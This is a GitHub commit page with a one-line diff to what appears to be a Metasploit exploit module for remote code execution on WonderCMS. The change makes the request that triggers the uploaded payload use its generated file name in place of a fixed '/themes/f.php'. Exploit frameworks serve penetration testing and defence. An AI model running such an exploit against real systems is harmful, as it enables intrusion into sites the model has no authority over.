Skip to content

Commit 77d0fe5

Browse files
committed
Fixing calling payload
1 parent 9d5c4a5 commit 77d0fe5

File tree

1 file changed

+1
-1
lines changed

1 file changed

+1
-1
lines changed

modules/exploits/multi/http/wondercms_rce.rb

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -158,7 +158,7 @@ def exploit
158158

159159
send_request_cgi!({
160160
'method' => 'GET',
161-
'uri' => normalize_uri(target_uri.path, '/themes/f.php')
161+
'uri' => normalize_uri(target_uri.path, "/themes/#{@payload_filename}")
162162
})
163163
end
164164
end

0 commit comments

Comments
 (0)